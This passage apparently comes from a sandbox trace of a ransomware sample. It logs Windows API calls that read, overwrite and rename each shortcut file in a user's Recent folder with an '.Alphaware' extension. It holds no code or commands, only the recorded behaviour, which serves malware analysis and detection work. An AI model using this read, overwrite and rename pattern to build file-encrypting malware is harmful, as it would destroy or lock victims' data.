ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8cec4c60, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x5f4)) returned 1 [0098.531] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0098.531] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\s8ZDF Lucr_Z28Spu.swf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\s8zdf lucr_z28spu.swf.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\s8ZDF Lucr_Z28Spu.swf.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\s8zdf lucr_z28spu.swf.lnk.alphaware")) returned 1 [0098.536] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\sD_Mf.lnk", dwFileAttributes=0x80) returned 1 [0098.536] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0098.537] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\sD_Mf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\sd_mf.lnk"), fInfoLevelId=0x0, lpFileInformation=0x249b358 | out: lpFileInformation=0x249b358*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xcee531e0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd14b54a0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd14b54a0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x8f6)) returned 1 [0098.537] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0098.537] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0098.537] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\sD_Mf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\sd_mf.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0098.537] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0098.537] ReadFile (in: hFile=0x250, lpBuffer=0x249bf00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x249bf00*, lpNumberOfBytesRead=0x23e958*=0x8f6, lpOverlapped=0x0) returned 1 [0098.560] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0098.560] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\sD_Mf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\sd_mf.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0098.561] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0098.562] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0098.562] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\sD_Mf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\sd_mf.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcee531e0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd14b54a0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8cf10f20, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xcc8)) returned 1 [0098.562] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0098.562] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\sD_Mf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\sd_mf.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\sD_Mf.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\sd_mf.lnk.alphaware")) returned 1 [0098.564] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\SjIEHWNzBPbEPK.lnk", dwFileAttributes=0x80) returned 1 [0098.565] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0098.565] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\SjIEHWNzBPbEPK.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\sjiehwnzbpbepk.lnk"), fInfoLevelId=0x0, lpFileInformation=0x25208d8 | out: lpFileInformation=0x25208d8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd0d1ee80, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0d1ee80, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd0d1ee80, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x2f8)) returned 1 [0098.565] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0098.565] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0098.565] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\SjIEHWNzBPbEPK.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\sjiehwnzbpbepk.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0098.565] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0098.565] ReadFile (in: hFile=0x250, lpBuffer=0x2520ec0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x2520ec0*, lpNumberOfBytesRead=0x23e958*=0x2f8, lpOverlapped=0x0) returned 1 [0098.589] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0098.589] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\SjIEHWNzBPbEPK.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\sjiehwnzbpbepk.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0098.591] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0098.592] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0098.592] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\SjIEHWNzBPbEPK.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\sjiehwnzbpbepk.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0d1ee80, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0d1ee80, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8cf5d1e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x4c8)) returned 1 [0098.592] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0098.592] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\SjIEHWNzBPbEPK.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\sjiehwnzbpbepk.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\SjIEHWNzBPbEPK.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\sjiehwnzbpbepk.lnk.alphaware")) returned 1 [0098.593] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\t2oMmxPi.flv.lnk", dwFileAttributes=0x80) returned 1 [0098.594] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0098.594] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\t2oMmxPi.flv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\t2ommxpi.flv.lnk"), fInfoLevelId=0x0, lpFileInformation=0x25a1ad8 | out: lpFileInformation=0x25a1ad8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xcffe1420, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcffe1420, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xcffe1420, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x3b1)) returned 1 [0098.594] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0098.594] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0098.594] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\t2oMmxPi.flv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\t2ommxpi.flv.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0098.594] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0098.594] ReadFile (in: hFile=0x250, lpBuffer=0x25a2180, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x25a2180*, lpNumberOfBytesRead=0x23e958*=0x3b1, lpOverlapped=0x0) returned 1 [0098.619] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0098.620] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\t2oMmxPi.flv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\t2ommxpi.flv.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0098.621] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0098.622] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0098.622] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\t2oMmxPi.flv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\t2ommxpi.flv.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcffe1420, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcffe1420, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8cfa94a0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x5c8)) returned 1 [0098.622] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0098.622] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\t2oMmxPi.flv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\t2ommxpi.flv.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\t2oMmxPi.flv.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\t2ommxpi.flv.lnk.alphaware")) returned 1 [0098.624] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\t2V3IQcrptDn.lnk", dwFileAttributes=0x80) returned 1 [0098.624] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0098.624] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\t2V3IQcrptDn.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\t2v3iqcrptdn.lnk"), fInfoLevelId=0x0, lpFileInformation=0x2423670 | out: lpFileInformation=0x2423670*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd08f4800, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd08f4800, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd08f4800, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x1367)) returned 1 [0098.625] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0098.625] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0098.625] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\t2V3IQcrptDn.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\t2v3iqcrptdn.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0098.625] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0098.625] ReadFile (in: hFile=0x250, lpBuffer=0x2423930, nNumberOfBytesToRead=0x1367, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x2423930*, lpNumberOfBytesRead=0x23e958*=0x1367, lpOverlapped=0x0) returned 1 [0098.648] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0098.648] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\t2V3IQcrptDn.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\t2v3iqcrptdn.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0098.650] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0098.651] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0098.651] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\t2V3IQcrptDn.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\t2v3iqcrptdn.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd08f4800, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd08f4800, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8cff5760, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1ab4)) returned 1 [0098.651] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0098.651] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\t2V3IQcrptDn.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\t2v3iqcrptdn.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\t2V3IQcrptDn.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\t2v3iqcrptdn.lnk.alphaware")) returned 1 [0098.653] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\T6C4G_g_0sfV1dVJsM.lnk", dwFileAttributes=0x80) returned 1 [0098.654] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0098.654] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\T6C4G_g_0sfV1dVJsM.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\t6c4g_g_0sfv1dvjsm.lnk"), fInfoLevelId=0x0, lpFileInformation=0x24af9b8 | out: lpFileInformation=0x24af9b8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd14691e0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd14691e0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd14691e0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x13b0)) returned 1 [0098.654] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0098.654] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0098.654] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\T6C4G_g_0sfV1dVJsM.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\t6c4g_g_0sfv1dvjsm.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0098.654] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0098.654] ReadFile (in: hFile=0x250, lpBuffer=0x24afcb0, nNumberOfBytesToRead=0x13b0, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x24afcb0*, lpNumberOfBytesRead=0x23e958*=0x13b0, lpOverlapped=0x0) returned 1 [0098.678] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0098.678] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\T6C4G_g_0sfV1dVJsM.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\t6c4g_g_0sfv1dvjsm.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0098.679] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0098.680] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0098.680] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\T6C4G_g_0sfV1dVJsM.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\t6c4g_g_0sfv1dvjsm.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd14691e0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd14691e0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8d041a20, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1b20)) returned 1 [0098.681] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0098.681] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\T6C4G_g_0sfV1dVJsM.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\t6c4g_g_0sfv1dvjsm.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\T6C4G_g_0sfV1dVJsM.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\t6c4g_g_0sfv1dvjsm.lnk.alphaware")) returned 1 [0098.682] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\te-nH.flv.lnk", dwFileAttributes=0x80) returned 1 [0098.682] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0098.682] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\te-nH.flv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\te-nh.flv.lnk"), fInfoLevelId=0x0, lpFileInformation=0x253ba20 | out: lpFileInformation=0x253ba20*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xcfce78a0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcfce78a0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xcfce78a0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x39e)) returned 1 [0098.683] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0098.683] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0098.683] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\te-nH.flv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\te-nh.flv.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0098.683] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0098.683] ReadFile (in: hFile=0x250, lpBuffer=0x253c078, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x253c078*, lpNumberOfBytesRead=0x23e958*=0x39e, lpOverlapped=0x0) returned 1 [0098.708] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0098.708] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\te-nH.flv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\te-nh.flv.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0098.709] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0098.710] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0098.711] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\te-nH.flv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\te-nh.flv.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfce78a0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcfce78a0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8d08dce0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x5a0)) returned 1 [0098.711] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0098.711] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\te-nH.flv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\te-nh.flv.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\te-nH.flv.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\te-nh.flv.lnk.alphaware")) returned 1 [0098.712] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\TKqjZN.flv.lnk", dwFileAttributes=0x80) returned 1 [0098.713] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0098.713] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\TKqjZN.flv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\tkqjzn.flv.lnk"), fInfoLevelId=0x0, lpFileInformation=0x25bd2e8 | out: lpFileInformation=0x25bd2e8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd03e5940, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd03e5940, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd03e5940, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0xdca)) returned 1 [0098.713] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0098.713] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0098.713] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\TKqjZN.flv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\tkqjzn.flv.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0098.713] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0098.713] ReadFile (in: hFile=0x250, lpBuffer=0x25be388, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x25be388*, lpNumberOfBytesRead=0x23e958*=0xdca, lpOverlapped=0x0) returned 1 [0098.739] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0098.739] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\TKqjZN.flv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\tkqjzn.flv.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, 